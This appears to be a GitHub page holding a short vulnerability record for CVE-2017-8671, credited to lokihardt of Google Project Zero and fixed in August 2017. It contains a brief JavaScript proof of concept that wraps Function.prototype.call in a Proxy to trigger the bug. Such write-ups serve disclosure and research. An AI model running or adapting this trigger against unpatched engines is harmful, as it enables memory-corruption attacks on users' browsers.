Skip to content

Latest commit

 

History

History
20 lines (14 loc) · 436 Bytes

CVE-2017-8671.md

File metadata and controls

20 lines (14 loc) · 436 Bytes

CVE-2017-8671

  • Fix: Aug 2017
  • Credit: lokihardt of Google Project Zero

PoC

function f() {
    print(arguments);
}

let call = new Proxy(Function.prototype.call, {});  // proxy calls set the flag
call.call(f);

Reference